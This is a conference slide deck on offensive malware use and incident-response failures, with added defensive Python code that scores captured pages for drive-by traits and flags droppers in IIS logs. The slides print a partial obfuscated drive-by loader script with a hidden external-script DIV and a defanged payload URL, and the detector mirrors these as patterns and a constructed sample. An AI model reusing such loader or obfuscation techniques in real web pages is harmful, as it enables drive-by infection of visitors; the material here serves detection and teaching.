Malware
Offensive usage and how to defend

Christiaan Beek
McAfee Professional Services
Agenda
• $whoami
• Examples
• Offensive ways of using malware
• What goes wrong
• Defense recommendations
• Final thoughts
> whoami
• Christiaan Beek
• Practice lead IR & Forensics EMEA
• Developer/Instructor MFIRE
• Training CERTs
A Little Background
Foundstone Services – McAfee Strategic Security
OFFENSE
Offensive usage of malware
Sectors: ENERGY & INFRA, Financial, MEDICAL, MOBILE, Defense
Offensive usage of malware

Why malware?
• low profile during preparation
• many options to spread / infect
• many ways to hide
• self-destruct mechanism
• many ways to transfer data to
Offensive usage of malware
• More and more discovery of malware frameworks
• Multiple modules / components
• Written by pros – sponsored by nations
Offensive - What’s Different?

Development:
• Nation-States
• Truly customized payloads

Delivery:
• Zero day propagation
• Multi-vectored: Bluetooth, USB, network

Detection:
• Digitally signed with compromised certificates
• Outbound exfiltration masking

Command & Control:
• Central command
• Modular payloads

Intent:
• Surveillance
• Disrupt / Destroy
Stages of an attack: [four diagram slides]
Stages of an attack – first script
    <script type="text/javascript" src="swfobject.js"></script>
    <script src=jpg.js></script>
    <script type="text/javascript">
    if(document.cookie.indexOf("DCHJEik8=")==-1 && hiOC2.indexOf("linux")<=-1 && hiOC2.indexOf("bot")==-1 &&
    hiOC2.indexOf("spider")==-1)
    var jMJFRp3=deconcept.SWFObjectUtil.getPlayerVersion();
    var expires=new Date();
    expires.setTime(expires.getTime()+1*60*60*1000);
    document.cookie="DCHJEik8=Yes;path=/;expires="+expires.toGMTString();

    for(WdkimKX2=0,gNRb4=true,sAgnGw8=["msie","firefox","opera"];gNRb4;WdkimKX2++){gNRb4=gNRb4 &&
    (navigator.userAgent.toLowerCase().indexOf(sAgnGw8[WdkimKX2])>-1);if(WdkimKX2==sAgnGw8.length-
    1)WdkimKX2=-1;}Hwqq6="0";delete Hwqq6;try{Hwqq6+="0"+"0";}catch(e){yltBe1=unescape;mYSdOxl6 =
    eval;}CwefLf0="S1+ADphS1(hmacmx8)))^MqiovxR7);}try{new function(){EmIcO0(EJiD6);}}catch(e){try{new
    function(){Qkrnq6=parseInt;vKFaTPR4(EJiD6);}}catch(e)
    }
    </script>
    <DIV style="VISIBILITY: hidden; WIDTH: 0px; HEIGHT: 0px"><script language="javascript"
    src="hxxp://count2.51yes……….. 31931&logo=12" charset="gb2312"></script></DIV>
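The script on the slide above is what a drive-by landing page looks like from the victim's browser: it serves the exploit only once per visitor (a marker cookie that expires after an hour), skips crawlers and non-target platforms, probes the browser and Flash version, and aliases eval/unescape under random names. For a defender who has captured such a page (proxy log, sandbox, web crawl), the useful thing is a heuristic that scores those traits. The following is an added example, not code from the deck or from McAfee; the indicator names, weights, verdict threshold and both sample pages are constructed for the example, and the suspicious sample keeps the structure of the slide's script without its payload.

```python
"""Heuristic scan of a captured web page for drive-by landing-page traits.

Added example; it is not code from the deck. The indicators mirror what is
visible in the obfuscated script on the previous slide: a marker cookie that
expires after one hour, exclusion of 'linux'/'bot'/'spider' user agents, a
browser-name probe, eval/unescape copied into renamed variables, a Flash
player version probe and a hidden 0px DIV loading an external script.
Sample pages, indicator names, weights and the verdict threshold are all
constructed for this example.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Indicator:
    name: str
    pattern: re.Pattern
    weight: int
    note: str


INDICATORS = [
    Indicator("cookie_gating",
              re.compile(r'document\.cookie\.indexOf\([^)]*\)\s*==\s*-1'),
              2, "branches on the absence of a marker cookie (hit each victim once)"),
    Indicator("crawler_exclusion",
              re.compile(r'indexOf\(\s*["\'](?:bot|spider|crawler|linux)["\']\s*\)', re.I),
              2, "user-agent checks that keep crawlers and non-target platforms away"),
    Indicator("browser_probe",
              re.compile(r'\[\s*["\']msie["\']\s*,\s*["\']firefox["\']\s*,\s*["\']opera["\']', re.I),
              1, "enumerates browser names, typically to pick a payload"),
    Indicator("eval_alias",
              re.compile(r'=\s*(?:eval|unescape)\s*;'),
              3, "eval/unescape assigned to another name to dodge naive signatures"),
    Indicator("hidden_loader",
              re.compile(r'<div[^>]*visibility:\s*hidden[^>]*>\s*<script[^>]*src=', re.I),
              2, "invisible DIV that pulls in an external script"),
    Indicator("flash_version_probe",
              re.compile(r'getPlayerVersion\s*\('),
              1, "Flash player version probe, used to choose an exploit"),
]


def scan_landing_page(html: str, threshold: int = 4) -> dict:
    """Return the matched indicators, a weighted score and a verdict."""
    hits = [ind for ind in INDICATORS if ind.pattern.search(html)]
    score = sum(ind.weight for ind in hits)
    return {
        "score": score,
        "indicators": [ind.name for ind in hits],
        "verdict": "suspicious" if score >= threshold else "clean",
    }


# Constructed sample: same structure as the slide's script, without its payload.
SUSPICIOUS_PAGE = """
<script type="text/javascript" src="swfobject.js"></script>
<script type="text/javascript">
var ua = navigator.userAgent.toLowerCase();
if (document.cookie.indexOf("MARK1=") == -1 && ua.indexOf("linux") == -1 &&
    ua.indexOf("bot") == -1 && ua.indexOf("spider") == -1) {
  var ver = deconcept.SWFObjectUtil.getPlayerVersion();
  var expires = new Date();
  expires.setTime(expires.getTime() + 60 * 60 * 1000);
  document.cookie = "MARK1=Yes;path=/;expires=" + expires.toGMTString();
  var names = ["msie", "firefox", "opera"];
  var u = unescape; var e = eval;
}
</script>
<DIV style="VISIBILITY: hidden; WIDTH: 0px; HEIGHT: 0px"><script language="javascript"
src="http://counter.example/stat.js"></script></DIV>
"""

# Constructed sample: a cookie-consent banner shares one trait but nothing else.
BENIGN_PAGE = """
<script src="jquery.js"></script>
<script>
if (document.cookie.indexOf("consent=") == -1) { showBanner(); }
</script>
<div style="display:none" id="tpl"><p>template</p></div>
"""

if __name__ == "__main__":
    for label, page in (("suspicious", SUSPICIOUS_PAGE), ("benign", BENIGN_PAGE)):
        print(label, scan_landing_page(page))
```

The weights matter more than any single regex: a cookie check on its own is ordinary web code (the benign sample trips it and still scores "clean"), whereas a cookie gate together with crawler exclusion and an aliased eval is hard to explain innocently. Run over pages pulled from proxy logs, the score is a triage signal, not a verdict.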
Final destination?:
hxxp://222.7x.xx.xx.xx/x.exe
Inner working?
IIS logs on hacked ‘landing’ server:

9/23/2012 4:06:16   70.49.x.x    W3SVC1   80   GET /x.exe
9/23/2012 4:07:46   99.23.x.x    W3SVC1   80   GET /x.exe
9/23/2012 4:08:25   93.80.x.x    W3SVC1   80   GET /x.exe
9/23/2012 4:14:48   208.91.x.x   W3SVC1   80   GET /x.exe
9/23/2012 4:36:05   95.27.x.x    W3SVC1   80   GET /pay/x.exe
9/23/2012 5:15:23   208.91.x.x   W3SVC1   80   GET /x.exe
9/23/2012 5:29:27   74.125.x.x   W3SVC1   80   GET /x.exe

Dial 80 or 443
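The log excerpt above is the view from the compromised web server: within about an hour and a half, six distinct client addresses fetch the same executable, which is the footprint of a dropper being handed out to victims rather than of normal site traffic. The check below is an added example, not from the deck or from McAfee: it parses lines in the simplified "date time client site port method uri" layout the slide shows and flags executables pulled by many distinct clients inside a short window. The log lines are constructed for the example; the slide's masked x.x addresses are replaced with RFC 5737 documentation addresses, and the client-count threshold and window are arbitrary.

```python
"""Spot a dropper being served from a web server's IIS logs.

Added example, not from the original deck. Parses the simplified
'date time client-ip site port method uri' layout shown on the slide and
flags executables fetched by many distinct client addresses within a
sliding time window. The log lines below are constructed for this example
(RFC 5737 documentation addresses stand in for the slide's masked x.x ones).
"""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_LOG = """\
9/23/2012 4:06:16 203.0.113.10 W3SVC1 80 GET /x.exe
9/23/2012 4:07:46 198.51.100.23 W3SVC1 80 GET /x.exe
9/23/2012 4:08:25 192.0.2.80 W3SVC1 80 GET /x.exe
9/23/2012 4:14:48 203.0.113.91 W3SVC1 80 GET /x.exe
9/23/2012 4:20:01 198.51.100.5 W3SVC1 80 GET /index.html
9/23/2012 4:36:05 192.0.2.27 W3SVC1 80 GET /pay/x.exe
9/23/2012 5:15:23 203.0.113.91 W3SVC1 80 GET /x.exe
9/23/2012 5:29:27 198.51.100.125 W3SVC1 80 GET /x.exe
9/23/2012 5:40:00 198.51.100.5 W3SVC1 80 GET /setup.exe
"""

# File types a landing server hands out as first-stage payloads.
EXECUTABLE_SUFFIXES = (".exe", ".scr", ".dll", ".msi")


def parse_line(line):
    """Parse one log line; return None for lines that do not fit the layout."""
    parts = line.split()
    if len(parts) < 7:
        return None
    date, time, client, _site, _port, method, uri = parts[:7]
    try:
        ts = datetime.strptime(f"{date} {time}", "%m/%d/%Y %H:%M:%S")
    except ValueError:
        return None
    return {"ts": ts, "client": client, "method": method, "uri": uri}


def find_dropper_candidates(log_text, min_clients=3, window=timedelta(hours=2)):
    """Executables requested by >= min_clients distinct addresses within `window`."""
    by_uri = defaultdict(list)
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec and rec["uri"].lower().endswith(EXECUTABLE_SUFFIXES):
            by_uri[rec["uri"]].append(rec)

    findings = []
    for uri, recs in by_uri.items():
        recs.sort(key=lambda r: r["ts"])
        # Slide a window starting at each request and count distinct clients in it.
        best = 0
        for i, start in enumerate(recs):
            clients = {r["client"] for r in recs[i:] if r["ts"] - start["ts"] <= window}
            best = max(best, len(clients))
        if best >= min_clients:
            findings.append({
                "uri": uri,
                "distinct_clients": best,
                "first_seen": recs[0]["ts"],
                "last_seen": recs[-1]["ts"],
            })
    return sorted(findings, key=lambda f: -f["distinct_clients"])


if __name__ == "__main__":
    for f in find_dropper_candidates(SAMPLE_LOG):
        print(f"{f['uri']}: {f['distinct_clients']} clients "
              f"between {f['first_seen']:%H:%M:%S} and {f['last_seen']:%H:%M:%S}")
```

The same grouping by requested object and distinct client works on real W3C extended logs once the `#Fields:` header is used to pick the `c-ip` and `cs-uri-stem` columns; the first_seen timestamp is also the earliest point at which the file landed on the server, which is where the forensic timeline of the server compromise starts.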
War story
Future usage of malware
Future scenarios
Future scenarios, or real...?
What goes wrong regarding Defense?
An Intel company

Problem #1
Many solutions, but how to use them?
Forensic readiness?

Problem #2
No visibility on the network
No correlation of events

Problem #3
Lack of skilled, experienced and dedicated people

Problem #4
No Incident Response procedures
No dry-run exercise

Problem #5
The attack came from…..

Problem #6
Destroying evidence

Problem #7
Who is the system owner?
Who will take action?
Who is allowed to take decisions?

Defense Strategies
The Big “Threat” Picture (each ring a subset of the one before):
All Threats > All Known Threats > Threats AntiVirus Sees > Threats AntiVirus Protects > Core
The “Core” Security Problem
• “Unauthorized” Execution
  – Payload/attachment/link
  – Network
  – Privilege
• “Authorized” Execution
  – Insiders’ misuse of privilege

Around “End Users = Data” on the slide: Identity Thieves, Spammers, Bot Herder, Vulnerability Discoverers, Tool Developers, Malware Developers (100101010010110)
Defense-in-depth
Worthless without:
Final thoughts......
- Incidents happen
- Is forensic & malware readiness on your agenda?
- What needs to be changed in your process?
- Is your {army-unit/company/agency/etc} prepared?
- Did you separate critical infrastructures?
- Can we help you?
Thank you!

Keep in touch:
Email: Christiaan_Beek@McAfee dot com
Twitter: @FSEMEA @Foundstone @ChristaanBeek
